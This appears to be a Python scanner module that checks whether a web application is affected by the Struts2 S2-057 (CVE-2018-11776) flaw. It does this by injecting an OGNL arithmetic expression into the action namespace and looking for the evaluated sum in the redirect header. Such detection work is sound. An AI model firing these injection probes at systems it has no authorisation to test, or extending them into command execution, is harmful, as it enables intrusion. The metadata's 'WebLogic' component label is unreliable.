#!/usr/bin/env python3
# From: JIGUANG [email protected]
# edits by hook-s3c (github.com/hook-s3c)
import requests,sys,random,json
requests.packages.urllib3.disable_warnings()
from urllib import parse
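def info():
    """Return the metadata record for the S2-057 (CVE-2018-11776) check.

    The record carries the CVE id, severity and a short description used by
    whatever scanner front-end loads this module.  The original version built
    the dict and then dropped it on the floor; returning it makes the function
    usable by callers.

    Returns:
        dict: the metadata record (keys ``id``, ``kind``, ``type``, ``name``,
        ``status``, ``method``, ``affectedComponent`` and several empty
        placeholder fields).
    """
    s2_057 = {"id": "CVE-2018-11776", "kind": "web", "type": "Remote Command Execution", "name": "Struts2 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1eCVE-2018-11776", "status": "high", "description": "", "expansion": "", "resolution": "", "method": "POST", "payload": "", "header": "", "body": "", "affectedComponent": [{"name": "WebLogic", "description": "Struts2\u662f\u4e00\u4e2a\u57fa\u4e8eMVC\u8bbe\u8ba1\u6a21\u5f0f\u7684Web\u5e94\u7528\u6846\u67b6\uff0c\u5b83\u672c\u8d28\u4e0a\u76f8\u5f53\u4e8e\u4e00\u4e2aservlet\uff0c\u5728MVC\u8bbe\u8ba1\u6a21\u5f0f\u4e2d\uff0cStruts2\u4f5c\u4e3a\u63a7\u5236\u5668(Controller)\u6765\u5efa\u7acb\u6a21\u578b\u4e0e\u89c6\u56fe\u7684\u6570\u636e\u4ea4\u4e92"}]}
    return s2_057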
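def poc(url):
    """Check whether ``url`` evaluates OGNL in the action namespace (S2-057).

    Two requests are made.  The base URL must answer 200; then a namespace of
    the form ``${r1+r2}`` (two random five-digit integers) is requested under
    ``/help.action``.  A Struts2 instance affected by CVE-2018-11776 evaluates
    the expression while building the redirect and reflects the sum in the
    302 ``Location`` header; an unaffected one does not.  Only an arithmetic
    expression is sent, so the check observes evaluation without running
    anything on the target.

    Args:
        url: base URL of the application to test.

    Prints a "vulnerable" / "not vulnerable" line for ``url``; returns None.
    Transport failures (unreachable host, timeout, TLS error) count as "not
    vulnerable".  Other exceptions propagate instead of being hidden by the
    bare ``except`` the original used, so a bug in the check is visible.
    """
    retval = False
    r1 = random.randint(10000, 99999)
    r2 = random.randint(10000, 99999)
    expected = str(r1 + r2)
    try:
        # verify=False and allow_redirects=False are deliberate: lab targets
        # often use self-signed certificates, and the evidence lives in the
        # redirect header itself, so the redirect must not be followed.
        res = requests.get(url=url, timeout=6, allow_redirects=False, verify=False)
        if res.status_code == 200:
            parts = parse.urlparse(url)
            probe = parts.scheme + '://' + parts.netloc + '/${%s+%s}/help.action' % (r1, r2)
            res = requests.get(url=probe, timeout=6, allow_redirects=False, verify=False)
            print("testing the url for exploit;", probe)
            location = res.headers.get('Location')
            # The sum shows up in the redirect target only if the namespace
            # expression was evaluated server-side; a literal echo of the
            # request path would contain "${r1+r2}", not the computed value.
            retval = res.status_code == 302 and location is not None and expected in location
    except requests.RequestException:
        # Best-effort scan: a host that cannot be reached is reported as
        # not vulnerable rather than aborting the run.
        pass
    finally:
        if retval:
            print('URL {} s2-057 CVE-2018-11776 is vulnerable!'.format(url))
        else:
            print('URL {} s2-057 CVE-2018-11776, not vulnerable!'.format(url))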
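if __name__ == '__main__':
    # Usage: <script> <url>.  Fail with a usage line rather than an
    # IndexError when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit('usage: {} <url>'.format(sys.argv[0]))
    args = sys.argv[1]
    poc(url=args)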